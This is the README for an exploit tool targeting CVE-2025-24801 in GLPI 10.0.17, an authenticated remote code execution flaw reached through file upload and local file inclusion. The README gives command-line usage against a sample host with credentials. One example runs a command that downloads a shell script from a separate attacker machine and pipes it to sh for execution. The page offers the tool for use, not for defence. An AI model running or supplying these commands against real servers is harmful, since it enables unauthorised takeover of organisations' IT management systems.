
CVE-2025-24801 PoC — GLPI allows authenticated remote code execution

Associated Vulnerability
Title: GLPI allows authenticated remote code execution (CVE-2025-24801)
Description: GLPI is a free asset and IT management software package. An authenticated user can upload and force the execution of *.php files located on the GLPI server. This vulnerability is fixed in 10.0.18.
Readme
# CVE-2025-24801

This exploit uses CVE-2025-24801 to obtain Remote Code Execution (RCE) via Local File Inclusion (LFI) on GLPI 10.0.17. See the [Proof of Concept (PoC)](https://blog.lexfo.fr/glpi-sql-to-rce.html) write-up of this CVE for an explanation of the vulnerability in GLPI.

## Observation
Some installations expose GLPI under the `/glpi/` path (e.g., http://172.16.11.130:8080/glpi/front/computer.form.php). If the target application uses this path, it must be included in the `--url` parameter (e.g., `--url http://172.16.11.130:8080/glpi`).

## Usage
Example usage:
```bash
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
```

If you have already run this exploit and triggered RCE, you can use the `--cmd` parameter to just execute a command:
```bash
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"
```